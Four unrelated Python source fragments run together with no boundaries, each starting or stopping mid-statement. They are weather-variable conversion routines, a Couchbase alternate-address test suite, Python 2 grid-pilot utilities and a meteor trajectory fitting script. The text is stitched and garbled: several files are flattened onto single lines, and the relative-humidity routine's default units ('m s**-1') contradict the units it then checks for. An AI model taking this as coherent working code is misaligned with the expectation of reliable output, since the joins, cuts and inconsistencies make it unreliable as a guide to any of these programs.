            var_values_step = var_values_step_end
            var_values_step_start = var_values_step_end
        else:
            var_values_step_end = var_values_step_tmp
            var_values_step = var_values_step_end - var_values_step_start
            var_values_step_start = var_values_step_end
        var_values_step[var_values_step < 0.0] = 0.0
        var_values_out[:, :, var_step] = var_values_step / var_scale_factor

    var_da_out = create_darray_3d(var_values_out, var_time, var_geo_x, var_geo_y,
                                  dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude',
                                  dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time',
                                  dims_order=['latitude', 'longitude', 'time'])

    var_dset_out = var_da_out.to_dataset(name=var_name)

    return var_dset_out
# -------------------------------------------------------------------------------------


# -------------------------------------------------------------------------------------
# Method to compute AirTemperature
def computeAirTemperature(var_dset, var_name, var_time=None, var_geo_x=None, var_geo_y=None,
                          var_units=None, var_step_type=None):
    """Convert instantaneous air temperature from Kelvin to Celsius."""
    # Set args
    if var_step_type is None:
        var_step_type = ['instant']
    if var_units is None:
        var_units = ['K']
    if var_geo_y is None:
        var_geo_y = ['latitude']
    if var_geo_x is None:
        var_geo_x = ['longitude']
    if var_time is None:
        var_time = ['valid_time']

    # Parse args
    var_name = list(var_name)[0]
    var_units = var_units[0]
    var_step_type = var_step_type[0]
    var_time = var_time[0]
    var_geo_x = var_geo_x[0]
    var_geo_y = var_geo_y[0]

    # Get values
    var_da_in = var_dset[var_name]
    var_values_in = var_da_in.values
    var_dims_in = var_da_in.dims
    var_time = var_dset[var_time]
    var_geo_x = var_dset[var_geo_x]
    var_geo_y = var_dset[var_geo_y]

    # Move a leading time/step axis to the trailing position (y, x, time).
    var_time_str = var_dims_in[0].lower()
    if (var_time_str == 'step') or (var_time_str == 'time'):
        var_values_in = reshape_var3d(var_values_in)
    var_shape_in = var_values_in.shape

    # Check attributes
    if not (var_units == 'K'):
        log_stream.error(' ===> Air Temperature components units are not allowed! Check your data!')
        raise IOError('Data units is not allowed!')
    if not (var_step_type == 'instant') and not (var_step_type == 'instantaneous'):
        log_stream.error(' ===> Air Temperature components allowed only in instantaneous format! Check your data!')
        raise IOError('Data type is not allowed!')

    var_values_out = np.zeros([var_shape_in[0], var_shape_in[1], var_shape_in[2]])
    var_values_out[:, :, :] = np.nan
    for var_step in range(0, var_shape_in[2]):
        var_values_step = var_values_in[:, :, var_step]
        # Kelvin -> Celsius.
        var_values_out[:, :, var_step] = var_values_step - 273.15

    var_da_out = create_darray_3d(var_values_out, var_time, var_geo_x, var_geo_y,
                                  dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude',
                                  dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time',
                                  dims_order=['latitude', 'longitude', 'time'])

    var_dset_out = var_da_out.to_dataset(name=var_name)

    return var_dset_out
# -------------------------------------------------------------------------------------


# -------------------------------------------------------------------------------------
# Method to compute RelativeHumidity using Q, T and pressure
def computeRH_from_Q(var_dset, var_name, var_time=None, var_geo_x=None, var_geo_y=None,
                     var_units=None, var_step_type=None):
    """Derive relative humidity from mixing ratio, air temperature and pressure.

    var_name holds four names: mixing ratio (kg kg-1), temperature (K),
    pressure (Pa) and the output RH variable.
    (Definition continues past this view — truncated here.)
    """
    # Set args
    if var_step_type is None:
        var_step_type = ['instant']
    if var_units is None:
        var_units = ['m s**-1']
    if var_geo_y is None:
        var_geo_y = ['latitude']
    if var_geo_x is None:
        var_geo_x = ['longitude']
    if var_time is None:
        var_time = ['valid_time']

    # Parse args
    var_name_1 = list(var_name)[0]
    var_name_2 = list(var_name)[1]
    var_name_3 = list(var_name)[2]
    var_name_4 = list(var_name)[3]
    var_units_1 = var_units[0]
    var_units_2 = var_units[1]
    var_units_3 = var_units[2]
    var_units_4 = var_units[3]
    var_step_type = var_step_type[0]
    var_time = var_time[0]
    var_geo_x = var_geo_x[0]
    var_geo_y = var_geo_y[0]

    # Get values
    var_da_in_1 = var_dset[var_name_1]
    var_values_in_1 = var_da_in_1.values
    var_dims_in_1 = var_da_in_1.dims
    var_da_in_2 = var_dset[var_name_2]
    var_values_in_2 = var_da_in_2.values
    var_dims_in_2 = var_da_in_2.dims
    var_da_in_3 = var_dset[var_name_3]
    var_values_in_3 = var_da_in_3.values
    var_dims_in_3 = var_da_in_3.dims

    var_time = var_dset[var_name_1][var_time]
    var_geo_x = var_dset[var_name_1][var_geo_x]
    var_geo_y = var_dset[var_name_1][var_geo_y]

    # Move a leading time/step axis to the trailing position (y, x, time).
    var_time_str_1 = var_dims_in_1[0].lower()
    if (var_time_str_1 == 'step') or (var_time_str_1 == 'time'):
        var_values_in_1 = reshape_var3d(var_values_in_1)
    var_shape_in_1 = var_values_in_1.shape
    var_time_str_2 = var_dims_in_2[0].lower()
    if (var_time_str_2 == 'step') or (var_time_str_2 == 'time'):
        var_values_in_2 = reshape_var3d(var_values_in_2)
    var_shape_in_2 = var_values_in_2.shape
    var_time_str_3 = var_dims_in_3[0].lower()
    if (var_time_str_3 == 'step') or (var_time_str_3 == 'time'):
        var_values_in_3 = reshape_var3d(var_values_in_3)
    var_shape_in_3 = var_values_in_3.shape

    # Check attributes
    if not (var_units_1 == 'kg kg-1') and not (var_units_1 == 'kg/kg'):
        log_stream.error(' ===> RelativeHumidity components units are not allowed! Check your data! [MixingRatio]')
        raise IOError('Data units is not allowed!')
    if not var_units_2 == 'K':
        log_stream.error(' ===> RelativeHumidity components units are not allowed! Check your data! [AirTemperature]')
        raise IOError('Data units is not allowed!')
    if not (var_units_3 == 'Pa') and not (var_units_3 == 'PA'):
        log_stream.error(' ===> RelativeHumidity components units are not allowed! Check your data! [AirPressure]')
        raise IOError('Data units is not allowed!')
    if not (var_step_type == 'instant') and not (var_step_type == 'instantaneous'):
        log_stream.error(' ===> RelativeHumidity components allowed only in instantaneous format! Check your data!')
        raise IOError('Data type is not allowed!')

    if not (var_shape_in_1 == var_shape_in_2) or not (var_shape_in_2 == var_shape_in_3):
        log_stream.error(' ===> RelativeHumidity dimensions are not the same! Check your data!')
        raise IOError('Data dimensions are not allowed!')
    else:
        var_shape_in = list({var_shape_in_1, var_shape_in_2, var_shape_in_3})[0]

    var_values_out = np.zeros([var_shape_in[0], var_shape_in[1], var_shape_in[2]])
    var_values_out[:, :, :] = np.nan
    for var_step
import copy import json, ast, filecmp, itertools import os, shutil, ast from threading import Thread from subprocess import Popen, PIPE, check_output, STDOUT, CalledProcessError from TestInput import TestInputSingleton, TestInputServer from alternate_address.alternate_address_base import AltAddrBaseTest from membase.api.rest_client import RestConnection, RestHelper from couchbase_helper.cluster import Cluster from remote.remote_util import RemoteMachineShellConnection from membase.helper.bucket_helper import BucketOperationHelper from membase.helper.cluster_helper import ClusterOperationHelper from couchbase_helper.documentgenerator import BlobGenerator, JsonDocGenerator from pprint import pprint from testconstants import CLI_COMMANDS, LINUX_COUCHBASE_BIN_PATH,\ WIN_COUCHBASE_BIN_PATH, COUCHBASE_FROM_MAD_HATTER,\ WIN_TMP_PATH_RAW class AlternateAddressTests(AltAddrBaseTest): def setUp(self): for server in TestInputSingleton.input.servers: remote = RemoteMachineShellConnection(server) remote.enable_diag_eval_on_non_local_hosts() remote.disconnect() super(AlternateAddressTests, self).setUp() self.remove_all_alternate_address_settings() self.cluster_helper = Cluster() self.ex_path = self.tmp_path + "export{0}/".format(self.master.ip) self.num_items = self.input.param("items", 1000) self.client_os = self.input.param("client_os", "linux") self.localhost = self.input.param("localhost", False) self.json_create_gen = JsonDocGenerator("altaddr", op_type="create", encoding="utf-8", start=0, end=self.num_items) self.json_delete_gen = JsonDocGenerator("imex", op_type="delete", encoding="utf-8", start=0, end=self.num_items) def tearDown(self): try: super(AlternateAddressTests, self).tearDown() except Exception as e: print e BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self) ClusterOperationHelper.cleanup_cluster(self.servers, self.servers[0]) def test_setting_alternate_address(self): server1 = self.servers[0] url_format = "" secure_port = "" secure_conn = "" 
self.skip_set_alt_addr = False shell = RemoteMachineShellConnection(server1) if self.secure_conn: cacert = self.get_cluster_certificate_info(server1) secure_port = "1" url_format = "s" if not self.no_cacert: secure_conn = "--cacert {0}".format(cacert) if self.no_ssl_verify: secure_conn = "--no-ssl-verify" output = self.list_alt_address(server=server1, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn) if output: output, _ = self.remove_alt_address_setting(server=server1, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn) mesg = 'SUCCESS: Alternate address configuration deleted' if not self._check_output(mesg, output): self.fail("Fail to remove alternate address") output = self.list_alt_address(server=server1, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn) if output and output[0] != "[]": self.fail("Fail to remove alternate address with remove command") self.log.info("Start to set alternate address") internal_IP = self.get_internal_IP(server1) setting_cmd = "{0}couchbase-cli{1} {2}"\ .format(self.cli_command_path, self.cmd_ext, "setting-alternate-address") setting_cmd += " -c http{0}://{1}:{2}{3} --username {4} --password {5} {6}"\ .format(url_format, internal_IP , secure_port, server1.port, server1.rest_username, server1.rest_password, secure_conn) setting_cmd = setting_cmd + "--set --hostname {0} ".format(server1.ip) shell.execute_command(setting_cmd) output = self.list_alt_address(server=server1, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn) if output and output[0]: output = output[0] output = output[1:-1] output = ast.literal_eval(output) if output["hostname"] != server1.ip: self.fail("Fail to set correct hostname") else: self.fail("Fail to set alternate address") self.log.info("Start to add node to cluster use internal IP") services_in = self.alt_addr_services_in if "-" in services_in: set_services = services_in.split("-") else: set_services 
= services_in.split(",") i = 0 num_hostname_add = 1 for server in self.servers[1:]: add_node_IP = self.get_internal_IP(server) node_services = "kv" if len(set_services) == 1: node_services = set_services[0] elif len(set_services) > 1: if len(set_services) == len(self.servers[1:]): node_services = set_services[i] i += 1 if self.add_hostname_node and num_hostname_add <= self.num_hostname_add: add_node_IP = server.ip num_hostname_add += 1 try: shell.alt_addr_add_node(main_server=server1, internal_IP=add_node_IP, server_add=server, services=node_services, cmd_ext=self.cmd_ext) except Exception as e: if e: self.fail("Error: {0}".format(e)) rest = RestConnection(self.master) rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[]) rest.monitorRebalance() self.log.info("Create default bucket") self._create_default_bucket(self.master) buckets = rest.get_buckets() status = RestHelper(rest).vbucket_map_ready(buckets[0].name) if not status: self.fail("Failed to create bucket.") if self.run_alt_addr_loader: if self.alt_addr_kv_loader: self.kv_loader(server1, client_os = self.client_os) if self.alt_addr_n1ql_query: self.n1ql_query(server1.ip, self.client_os, create_travel_sample_bucket=True) if self.alt_addr_eventing_function: self.create_eventing_function(server1, self.client_os, create_travel_sample_bucket=True) self.skip_set_alt_addr = True alt_addr_status = [] if not self.skip_set_alt_addr: for server in self.servers[1:]: internal_IP = self.get_internal_IP(server) status = self.set_alternate_address(server, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn, internal_IP = internal_IP) alt_addr_status.append(status) if False in alt_addr_status: self.fail("Fail to set alt address") else: self.all_alt_addr_set = True if self.run_alt_addr_loader: if self.alt_addr_kv_loader: self.kv_loader(server1, self.client_os) if self.alt_addr_n1ql_query: self.n1ql_query(server1.ip, self.client_os) remove_node = "" if 
self.alt_addr_rebalance_out: internal_IP = self.get_internal_IP(self.servers[-1]) reject_node = "ns_1@{0}".format(internal_IP) self.log.info("Rebalance out a node {0}".format(internal_IP)) rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],\ ejectedNodes=[reject_node]) reb_status = rest.monitorRebalance() self.assertTrue(reb_status, "Rebalance out node {0} failed".format(internal_IP)) remove_node = internal_IP if self.alt_addr_rebalance_in and self.alt_addr_rebalance_out: if remove_node: free_node = remove_node if self.add_hostname_node: free_node = self.get_external_IP(remove_node) cmd = 'curl -X POST -d "hostname={0}&user={1}&password={2}&services={3}" '\ .format(free_node, server1.rest_username, server1.rest_password, self.alt_addr_rebalance_in_services) cmd += '-u Administrator:password http://{0}:8091/controller/addNode'\ .format(server1.ip) shell.execute_command(cmd) rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],\ ejectedNodes=[]) reb_status = rest.monitorRebalance() self.assertTrue(reb_status, "Rebalance back in failed") status = self.set_alternate_address(self.servers[-1], url_format = url_format, secure_port = secure_port, secure_conn = secure_conn, internal_IP = free_node) if status: self.all_alt_addr_set = True else: self.all_alt_addr_set = False else: self.fail("We need a free node to add to cluster") if self.run_alt_addr_loader: if self.alt_addr_kv_loader: self.kv_loader(server1, self.client_os) if self.alt_addr_n1ql_query: self.n1ql_query(server1.ip, self.client_os) status = self.remove_all_alternate_address_settings() if not status: self.fail("Failed to remove all alternate address setting") def test_alt_addr_with_xdcr(self): url_format = "" secure_port = "" secure_conn = "" self.setup_xdcr_cluster() des_alt_addr_set = False self.log.info("Create bucket at source") src_master = self.clusters_dic[0][0] self._create_buckets(src_master) src_rest = RestConnection(src_master) src_buckets = src_rest.get_buckets() if 
src_buckets and src_buckets[0]: src_bucket_name = src_buckets[0].name else: self.fail("Failed to create bucket at src cluster") des_master = self.clusters_dic[1][0] self.log.info("Create bucket at destination") self._create_buckets(des_master) des_rest = RestConnection(des_master) des_buckets = des_rest.get_buckets() if des_buckets and des_buckets[0]: des_bucket_name = des_buckets[0].name else: self.fail("Failed to create bucket at des cluster") for server in self.clusters_dic[0]: internal_IP = self.get_internal_IP(server) status = self.set_alternate_address(server, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn, internal_IP = internal_IP) self.all_alt_addr_set = True self.kv_loader(src_master, "mac") self.create_xdcr_reference(src_master.ip, des_master.ip) src_num_docs = int(src_rest.get_active_key_count(src_bucket_name)) count = 0 src_num_docs = int(src_rest.get_active_key_count(src_bucket_name)) while count < 10: if src_num_docs < 10000: self.sleep(10, "wait for items written to bucket") src_num_docs = int(src_rest.get_active_key_count(src_bucket_name)) count += 1 if src_num_docs == 10000: self.log.info("all bucket items set") break if count == 2: self.fail("bucket items does not set after 30 seconds") self.create_xdcr_replication(src_master.ip, des_master.ip, src_bucket_name) self.sleep(25, "time needed for replication to be created") self.log.info("Reduce check point time to 30 seconds") self.set_xdcr_checkpoint(src_master.ip, 30) #self.set_xdcr_checkpoint(des_master.ip, 30) self.log.info("Get xdcr configs from cluster") shell = RemoteMachineShellConnection(self.master) rep_id_cmd = "curl -u Administrator:password http://{0}:8091/pools/default/remoteClusters"\ .format(self.master.ip) output, error = shell.execute_command(rep_id_cmd) output = output[0][1:-1] xdcr_config = json.loads(output) cmd = "curl -u Administrator:password http://localhost:8091/sasl_logs/goxdcr " cmd += "| grep 'Execution timed out' | tail -n 1 " output, 
error = shell.execute_command(cmd) self.log.info("Verify replication timeout due to alt addr does not enable at des cluster") if xdcr_config["uuid"] in output[0] and "Execution timed out" in output[0]: self.log.info("replication failed as expected as alt addr does not enable at des") else: self.fail("Alt addr failed to disable at des cluster") count = 0 des_num_docs = int(des_rest.get_active_key_count(des_bucket_name)) while count < 6: if src_num_docs != des_num_docs: self.sleep(60, "wait for replication ...") des_num_docs = int(des_rest.get_active_key_count(des_bucket_name)) count += 1 elif src_num_docs == des_num_docs: self.fail("Replication should fail. Alt addr at des does not block") break if count == 6: if not des_alt_addr_set: self.log.info("This is expected since alt addr is not set yet") des_alt_addr_status =[] for server in self.clusters_dic[1]: internal_IP = self.get_internal_IP(server) des_alt_addr_status.append(self.set_alternate_address(server, url_format = url_format, secure_port = secure_port, secure_conn = secure_conn, internal_IP = internal_IP)) if False in des_alt_addr_status: self.fail("Failed to set alt addr at des cluster") else: des_alt_addr_set = True count = 0 self.log.info("Restart replication") cmd = "curl -X POST -u Administrator:password " cmd += "http://{0}:8091/settings/replications/{1}%2F{2}%2F{2} "\ .format(self.master.ip, xdcr_config["uuid"], des_bucket_name) cmd += "-d pauseRequested=" try: check_output(cmd + "true", shell=True, stderr=STDOUT) self.sleep(20) check_output(cmd + "false", shell=True, stderr=STDOUT) except CalledProcessError as e: print("Error return code: {0}".format(e.returncode)) if e.output: self.fail(e.output) des_rest = RestConnection(des_master) self.log.info("Verify docs is replicated to des cluster") while count < 6: if src_num_docs != des_num_docs: self.sleep(60, "wait for replication start...") des_num_docs = int(des_rest.get_active_key_count(des_bucket_name)) count += 1 elif src_num_docs == des_num_docs: 
self.log.info("Replication is complete") break if count == 6: if des_alt_addr_set: self.fail("Replication does not complete after 6 minutes") self.delete_xdcr_replication(src_master.ip, xdcr_config["uuid"]) def remove_all_alternate_address_settings(self): self.log.info("Remove alternate address setting in each node") remove_alt = [] for server in self.servers: shell = RemoteMachineShellConnection(server) cmd = "{0}couchbase-cli{1} {2} -c {3}:{4} --username {5} --password {6} {7}"\ .format(self.cli_command_path, self.cmd_ext, "setting-alternate-address", server.ip, server.port, server.rest_username, server.rest_password, "--remove") output, error = shell.execute_command(cmd, debug=True) if error: remove_alt.append(error) shell.disconnect() if remove_alt: self.log.error("Remove alt address failed: {0}".format(remove_alt)) return False else: return True def remove_alt_address_setting(self, server=None, url_format = "", secure_port = "", secure_conn = ""): sub_command = "setting-alternate-address" if server is None: server = self.master cmd = "{0}couchbase-cli{1} {2} -c http{3}://{4}:{5}{6} --username {7} --password {8} {9}"\ .format(self.cli_command_path, self.cmd_ext, sub_command, url_format, server.ip, secure_port, server.port, server.rest_username, server.rest_password, secure_conn) remove_cmd = cmd + " --remove" shell = RemoteMachineShellConnection(server) output, error = shell.execute_command(remove_cmd) shell.disconnect() return output, error def list_alt_address(self, server=None, url_format = "", secure_port = "", secure_conn = ""): sub_command = "setting-alternate-address" if server is None: server = self.master cmd = "{0}couchbase-cli{1} {2} -c http{3}://{4}:{5}{6} --username {7} --password {8} {9}"\ .format(self.cli_command_path, self.cmd_ext, sub_command, url_format, server.ip, secure_port, server.port, server.rest_username, server.rest_password, secure_conn) list_cmd = cmd + " --list" shell = RemoteMachineShellConnection(server) output, error = 
shell.execute_command(list_cmd) shell.disconnect() return output def set_alternate_address(self,
supported,") tolog(". otherwise this job will fail") elif not some_transferred: tolog(". No files (%d/%d) were transferred or registered" % (nr_transferred, nr_files)) if nr_files > 1: tolog(". The files will be transferred and registrered by a later pilot if job recovery is supported,") else: tolog(". The file will be transferred and registrered by a later pilot if job recovery is supported,") tolog(". otherwise this job will fail") else: tolog(". Mover has finished") if fail != 0: tolog(". File transfer exit code : (%d, %s)" % (fail, error.getErrorStr(fail))) else: tolog(". File transfer exit code : (%d, <no error>)" % (fail)) if some_transferred: tolog(". File registration return values : (%d, %s, %s)" %\ (ec, error.getErrorStr(ec), str(ret))) tolog(". Put function will return fields : %s" % str(fields)) tolog(". Transfer and registration report produced at : %s" % timeStamp()) tolog("...........................................................................................................") tolog("") def hasBeenTransferred(fields): """ determine whether files were successfully transferred """ status = False s = 0 # the fields will all be empty if no files were transferred for field in fields: s += len(field) if s > 0: status = True return status def removeSRMInfo(f0): """ remove any SRM info from the f0 string """ from SiteMover import SiteMover fields0 = "" for pfns in f0.split("+"): if pfns != "": pfns = SiteMover.stripPortAndVersion(pfns) fields0 += "%s+" % (pfns) # remove any trailing +-sign if fields0[-1] == "+": fields0 = fields0[:-1] if fields0 == "": fields0 = f0 if f0 != fields0: tolog("removeSRMInfo() has updated %s to %s" % (f0, fields0)) return fields0 def lateRegistration(ub, job, type="unknown"): """ late registration used by the job recovery """ # function will return True if late registration has been performed, False if it failed # and None if there is nothing to do status = False latereg = False fields = None # protect against old jobState 
files which may not have the new variables try: tolog("type: %s" % (type)) if type == "output": if job.output_latereg == "False": latereg = False else: latereg = True fields = job.output_fields elif type == "log": if job.log_latereg == "False": latereg = False else: latereg = True fields = job.log_field else: tolog("!!WARNING!!4000!! Unknown id type for registration: %s" % (type)) tolog("!!WARNING!!4000!! Skipping late registration step") pass except Exception, e: tolog("!!WARNING!!4000!! Late registration has come upon an old jobState file - can not perform this step: %s" % e) pass else: tolog("latereg: %s" % str(latereg)) tolog("fields: %s" % str(fields)) # should late registration be performed? # if latereg: # ec, ret = registerFiles(fields, ub=ub) # if ec == 0: # tolog("registerFiles done") # status = True # else: # tolog("!!WARNING!!4000!! File registration returned: (%d, %s)" % (ec, ret)) if not latereg: tolog("Nothing to register (%s)" % (type)) return None else: return status def isAnalysisJob(trf): """ Determine whether the job is an analysis job or not """ if (trf.startswith('https://') or trf.startswith('http://')): analysisJob = True else: analysisJob = False return analysisJob def timedCommand(cmd, timeout=300): """ Protect cmd with timed_command """ tolog("Executing command: %s (protected by timed_command, timeout: %d s)" % (cmd, timeout)) t0 = os.times() try: exitcode, telapsed, cout, cerr = timed_command(cmd, timeout) except Exception, e: pilotErrorDiag = 'timed_command() threw an exception: %s' % e tolog("!!WARNING!!2220!! %s" % pilotErrorDiag) exitcode = 1 output = e t1 = os.times() telapsed = int(round(t1[4] - t0[4])) else: if cerr != "" and exitcode != 0: tolog("!!WARNING!!2220!! Timed command stderr: %s" % (cerr)) output = cerr else: output = cout tolog("Elapsed time: %d" % (telapsed)) if telapsed >= timeout: tolog("!!WARNING!!2220!! 
Command timed out") output += " (timed out)" # timed_command adds a trailing \n, remove it if output.endswith('\n'): output = output[:-1] return exitcode, output def stringToFields(jobFields): """ Convert a jobState string to a fields array """ jobFields = jobFields.replace('[','').replace(']','') jobFields = jobFields.replace("\'","") rf = jobFields.split(',') fields = [] for f in rf: fields += [f.strip()] return fields def readpar(parameter, alt=False, version=0): """ Read 'parameter' from queuedata via SiteInformation class """ from SiteInformation import SiteInformation si = SiteInformation() return si.readpar(parameter, alt=alt, version=version) def getBatchSystemJobID(): """ return the batch system job id (will be reported to the server) """ # BQS (e.g. LYON) if os.environ.has_key("QSUB_REQNAME"): return "BQS", os.environ["QSUB_REQNAME"] # BQS alternative if os.environ.has_key("BQSCLUSTER"): return "BQS", os.environ["BQSCLUSTER"] # Torque if os.environ.has_key("PBS_JOBID"): return "Torque", os.environ["PBS_JOBID"] # LSF if os.environ.has_key("LSB_JOBID"): return "LSF", os.environ["LSB_JOBID"] # Sun's Grid Engine if os.environ.has_key("JOB_ID"): return "Grid Engine", os.environ["JOB_ID"] # Condor (variable sent through job submit file) if os.environ.has_key("clusterid"): return "Condor", os.environ["clusterid"] # Condor (get jobid from classad file) if os.environ.has_key("_CONDOR_JOB_AD"): return "Condor", commands.getoutput('sed -n "s/GlobalJobId.*\\"\\(.*\\)\\".*/\\1/p" %s' % os.environ["_CONDOR_JOB_AD"]) # SLURM if os.environ.has_key("SLURM_JOB_ID"): return "SLURM", os.environ["SLURM_JOB_ID"] # # Condor (id unknown) # if os.environ.has_key("_CONDOR_SCRATCH_DIR"): # return "Condor", "(unknown clusterid)" return None, "" def touch(filename): """ touch a file """ if not os.path.isfile(filename): try: os.system("touch %s" % (filename)) except Exception, e: tolog("!!WARNING!!1000!! 
Failed to touch file: %s" % e) else: tolog("Lock file created: %s" % (filename)) def createLockFile(jobrec, workdir, lockfile="LOCKFILE"): """ Site workdir protection to prevent the work dir from being deleted by the cleanup function if pilot fails to register the log """ # only try to create a lock file if it doesn't exist already # do not bother to create it if the site doesn't allow for job recovery f = "%s/%s" % (workdir, lockfile) if lockfile == "LOCKFILE": if jobrec: touch(f) else: touch(f) def checkLockFile(workdir, lockfile): """checks if a lockfile exists in path workdir/lockfile """ f = '%s/%s' % (workdir, lockfile) return os.path.isfile(f) def verifyTransfer(workdir, verbose=True): """ verify that all files were transferred by checking the existance of the ALLFILESTRANSFERRED lockfile """ status = False fname = "%s/ALLFILESTRANSFERRED" % (workdir) if os.path.exists(fname): if verbose: tolog("Verified: %s" % (fname)) status = True else: if verbose: tolog("Transfer verification failed: %s (file does not exist)" % (fname)) return status def removeLEDuplicates(logMsg): """ identify duplicated messages in the log extracts and remove them """ # first create a new log extracts list that does not have the time stamps # (which will be different for the otherwise different messages) # E.g.: # 31 Mar 2008 01:32:37| !!WARNING!!1999!! Could not read modification time of ESD.020072._04023.pool.root.9 # 31 Mar 2008 02:03:08| !!WARNING!!1999!! Could not read modification time of ESD.020072._04023.pool.root.9 # should only be printed once, # 31 Mar 2008 01:32:37| !!WARNING!!1999!! 
Could not read modification time of ESD.020072._04023.pool.root.9 log_extracts_list = logMsg.split('\n') # create a temporary list with stripped timestamp fields log_extracts_tmp = [] pattern = re.compile(r"(\d+ [A-Za-z]+ \d+ \d+:\d+:\d+\|)") for line in log_extracts_list: # id the time stamp found = re.findall(pattern, line) if len(found) > 0: # remove any time stamp line = line.replace(found[0], '') log_extracts_tmp.append(line) # remove duplicate lines and create an index list to know where the original line was # (we want to bring back the timestamp) # do not use dictionaries since they are not sorted i = 0 log_extracts_index = [] log_extracts_tmp2 = [] for line in log_extracts_tmp: if line not in log_extracts_tmp2: log_extracts_index.append(i) log_extracts_tmp2.append(line) i += 1 # create the final list log_extracts_tmp = [] for index in log_extracts_index: log_extracts_tmp.append(log_extracts_list[index]) # return the stripped logMsg return "\n".join(log_extracts_tmp) def writeTimeStampToFile(path="", filename="", overwrite=True): """ Write the current time stamp to file """ if filename == "": filename = "START_TIME" if path == "": path = os.getcwd() _filename = os.path.join(path, filename) # Are we allowed to overwrite? proceed = False if overwrite: proceed = True else: # Only proceed if the file does not exist already if not os.path.exists(_filename): proceed = True if proceed: writeToFile(_filename, timeStampUTC(format='%Y-%m-%d %H:%M:%S')) def writeToFile(filename, s): """ Write string s to file """ # Ignore write status status = writeToFileWithStatus(filename, s) def writeToFileWithStatus(filename, s, attribute="w"): """ Write string s to file with status return """ status = False try: f = open(filename, attribute) except Exception, e: tolog("!!WARNING!!2990!! 
Could not open: %s, %s" % (filename, e)) else: f.write("%s" % (s)) f.close() tolog('Wrote string "%s" to file: %s' % (s.replace('\n',''), filename)) status = True return status def readCodeFromFile(filename): """ Wead exit code from file <workdir>/EXITCODE """ ec = 0 if os.path.exists(filename): try: f =
with the given parameters time_arr = timeFromLen(len_arr, t0, l0, v0, v_inf, sigma, c, zr, dens_interp) # Sum of squared residuals cost = np.sum((time_target - time_arr)**2) # # Sum of absolute residuals # cost = np.sum(np.abs(time_target - time_arr)) print("Cost = {:16.10f}, guess: l0 = {:7.3f}, v0 = {:6.3f}, vi = {:6.3f}, sigma = {:.5f}".format(cost, *params)) return cost # Choose t0 at the 0.77*max_time (converges better if this is at a point where there's deceleration) t0 = 0.77*np.max(time_data) print("t0 = {:.2f} s".format(t0)) # Construct the initial guess of the fit parameters using the Jacchia function l0 = jacchiaFuncLen(t0, a1, a2, a3, a4) v0 = jacchiaFuncVel(t0, a1, a2, a3, a4) v_inf = a2 sigma = sigma_initial # km^2/s^2 # Separate initial guess velocities if they are too close if (v_inf - v0) < 1: v0 = v_inf - 2 p0 = [l0, v0, v_inf, sigma] print("Initial parameters:", p0) # Set the optimization bounds bounds = [ ( 0, np.max(len_data)), # l0 ( 0, 80.0), # v0 (10, 80.0), # v_inf (0.0001, 1.0) # sigma ] # Set the constraint that v_inf > v0 constraints = ({'type': 'ineq', 'fun': lambda x: x[2] - x[1]}) # Fit the parameters to the observations res = scipy.optimize.minimize(_residuals, p0, args=(t0, c, zr, dens_interp, len_data, time_data), \ bounds=bounds, constraints=constraints, method='SLSQP') # # Default tolerance using by SLSQP # ftol = 1e-06 # # Compute the formal uncertainties # # Source: https://stackoverflow.com/a/53489234 # tmp_i = np.zeros(len(res.x)) # for i in range(len(res.x)): # tmp_i[i] = 1.0 # hess_inv_i = res.hess_inv(tmp_i)[i] # uncertainty_i = np.sqrt(max(1, abs(res.fun))*ftol*hess_inv_i) # tmp_i[i] = 0.0 # print('x^{0} = {1:.3f} ± {2:.6f}'.format(i, res.x[i], uncertainty_i)) l0, v0, v_inf, sigma = res.x return t0, l0, v0, v_inf, sigma, c, zr, dens_interp if __name__ == "__main__": import os import sys import argparse import matplotlib.pyplot as plt from wmpl.Utils.Pickling import loadPickle # ### COMMAND LINE ARGUMENTS # # Init the 
command line arguments parser # arg_parser = argparse.ArgumentParser(description="""Fit the Pecina & Ceplecha (1984) model to a trajectory in the pickle file.""", # formatter_class=argparse.RawTextHelpFormatter) # arg_parser.add_argument('input_file', type=str, help='Path to the .pickle file.') # # Parse the command line arguments # cml_args = arg_parser.parse_args() # ############################ # # Load the pickle file # if not os.path.isfile(cml_args.input_file): # print("Could not find file:", cml_args.input_file) # print("Exiting...") # sys.exit() # # Load the trajectory pickle file # traj = loadPickle(*os.path.split(cml_args.input_file)) # # Extract the time, height, and length data # time_data = [] # len_data = [] # ht_data = [] # vel_data = [] # for obs in traj.observations: # # Relative time in seconds # time_obs = obs.time_data[obs.ignore_list == 0] # time_data += time_obs.tolist() # # Height in km # ht_obs = obs.model_ht[obs.ignore_list == 0]/1000 # ht_data += ht_obs.tolist() # # Length in km # len_obs = obs.state_vect_dist[obs.ignore_list == 0]/1000 # len_data += len_obs.tolist() # # Velocity in km/s # vel_obs = obs.velocities[obs.ignore_list == 0]/1000 # vel_data += vel_obs.tolist() # # Sort observations by length # tmp_arr = np.c_[time_data, ht_data, len_data, vel_data] # tmp_arr = tmp_arr[np.argsort(len_data)] # time_data, ht_data, len_data, vel_data = tmp_arr.T # # # Check data # # plt.scatter(time_data, len_data) # # plt.show() # # plt.scatter(ht_data, vel_data) # # plt.show() # # Fit the Pecina & Ceplecha (1984) model to observations # t0, l0, v0, v_inf, sigma, c, zr, dens_interp = fitPecinaCeplecha84Model(traj.rend_lat, traj.rend_lon, \ # traj.jdt_ref, time_data, ht_data, len_data) # print("Solution:") # print(" t0 = {:.3f} s".format(t0)) # print(" l0 = {:.3f} km".format(l0)) # print(" v0 = {:.3f} km/s".format(v0)) # print(" v_inf = {:.3f} km/s".format(v_inf)) # print(" sigma = {:.6f} km^2/s^2".format(sigma)) # # Compute the h0 limit # h0 = 
